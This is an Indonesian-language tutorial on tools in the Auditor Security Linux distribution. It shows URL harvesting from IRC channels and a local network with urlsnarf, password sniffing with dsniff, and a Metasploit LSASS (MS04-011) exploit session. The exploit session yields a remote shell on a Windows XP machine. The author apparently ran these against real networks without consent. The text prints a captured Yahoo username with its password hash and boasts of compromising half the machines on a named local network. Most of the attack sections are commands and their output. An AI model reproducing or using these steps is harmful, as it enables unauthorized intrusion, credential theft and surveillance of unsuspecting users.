Auditor security merupakan sebuah system operasi yang bersifat live-system
berbasiskan pada knopix.
Menurut penciptanya yang dituliskan pada http://remote-exploit.org ,
linux Auditor Security diciptakan untuk memenuhi kebutuhan para excellent-user
yang dikombinasikan
dengan toolset yang optimal serta penggunakan yang user friendly. Program –
program open source pada
auditor security menawarkan toolset yang komplit untuk meng-analysis keamanan
sebuah system, byte per byte.
Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat
pada linux Auditor Security.
A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh
seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu
channel IRC dan pada jaringan lokal yang
terhubung dengan internet.
1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan
XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu.
Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa
saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan
bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50,
#indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.
ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>
Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter
pada channel – channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL
yang dikunjungi tiap chatter.
2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet
Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing
URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan
URL Snarf ketikan perintah berikut
pada konsole :
hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt
Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal
tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil
penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam
00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.
192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts"
"Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"
Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer
dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses
www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan
browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.
B. Sniffing Menggunakan DSNIFF
Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu
dalam suatu network dangan jalan
meng-capture paket – paket data yang ada pada suatu network dan kemudian
menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia
pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:
hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db
perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket
yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:
hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db
Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa
dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :
hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt
Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis
documentasikan :
09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1
HTTP/1.1Host: us.rd.yahoo.com
Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan
pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan
memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie
dengan password hasil enkripsi
MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.
C. Remote Exploit
Remote exploit adalah suatu program yang dijalankan pada computer attacker,
digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun
sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai
dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi
IP pada jaringan SKB50.
hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)
Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit
:
hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole
jika berhasil maka akan muncul tulisan seperti berikut ini :
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >
untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
backupexec_ns Veritas Backup Exec Name Service Overflow
bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
cabrightstor_disco CA BrightStor Discovery Service Overflow
cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflo
cabrightstor_uniagent CA BrightStor Universal Agent Overflow
calicclnt_getconfig CA License Client GETCONFIG Overflow
calicserv_getconfig CA License Server GETCONFIG Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
ia_webmail IA WebMail 3.x Buffer Overflow
icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
iis40_htr IIS 4.0 .HTR Buffer Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow
iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow
iis_source_dumper IIS Web Application Source Code Disclosure
iis_w3who_overflow IIS w3who.dll ISAPI Overflow
imail_imap_delete IMail IMAP4D Delete Overflow
imail_ldap IMail LDAP Service Buffer Overflow
irix_lpsched_exec Irix lpsched Command Execution
lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
mercantec_softcart Mercantec SoftCart CGI Overflow
minishare_get_overflow Minishare 1.41 Buffer Overflow
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
openview_omniback HP OpenView Omniback II Command Execution
oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
payload_handler Metasploit Framework Payload Handler
poptop_negative_read Poptop Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
samba_nttrans Samba Fragment Reassembly Overflow
samba_trans2open Samba trans2open Overflow
samba_trans2open_osx Samba trans2open Overflow (Mac OS X)
samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC)
sambar6_search_results Sambar 6 Search Results Buffer Overflow
seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow
sentinel_lm7_overflow SentinelLM UDP Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
smb_sniffer SMB Password Capture Service
solaris_dtspcd_noir Solaris dtspcd Heap Overflow
solaris_kcms_readfile Solaris KCMS Arbitary File Read
solaris_lpd_exec Solaris LPD Command Execution
solaris_sadmind_exec Solaris sadmind Command Execution
solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow
solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
squid_ntlm_authenticate Squid NTLM Authenticate Overflow
svnserve_date Subversion Date Svnserve
trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
uow_imap4_copy University of Washington IMAP4 COPY Overflow
uow_imap4_lsub University of Washington IMAP4 LSUB Overflow
ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
warftpd_165_pass War-FTPD 1.65 PASS Overflow
warftpd_165_user War-FTPD 1.65 USER Overflow
webstar_ftp_user WebSTAR FTP Server USER Overflow
windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow
wins_ms04_045 Microsoft WINS MS04-045 Code Execution
wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread",
"seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP kicks:epmap 0.0.0.0:0 LISTENING
TCP kicks:microsoft-ds 0.0.0.0:0 LISTENING
TCP kicks:1025 0.0.0.0:0 LISTENING
TCP kicks:1056 0.0.0.0:0 LISTENING
TCP kicks:1090 0.0.0.0:0 LISTENING
TCP kicks:1095 0.0.0.0:0 LISTENING
TCP kicks:1098 0.0.0.0:0 LISTENING
TCP kicks:1130 0.0.0.0:0 LISTENING
TCP kicks:4444 0.0.0.0:0 LISTENING
TCP kicks:5000 0.0.0.0:0 LISTENING
TCP kicks:netbios-ssn 0.0.0.0:0 LISTENING
TCP kicks:1162 0.0.0.0:0 LISTENING
TCP kicks:1169 0.0.0.0:0 LISTENING
TCP kicks:4444 192.168.0.10:1382 ESTABLISHED
UDP kicks:microsoft-ds *:*
UDP kicks:isakmp *:*
UDP kicks:ntp *:*
UDP kicks:1900 *:*
UDP kicks:ntp *:*
UDP kicks:netbios-ns *:*
UDP kicks:netbios-dgm *:*
UDP kicks:1900 *:*
^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >
Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang
akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan
melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban
terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat
analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti
bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).
Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
>From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.
|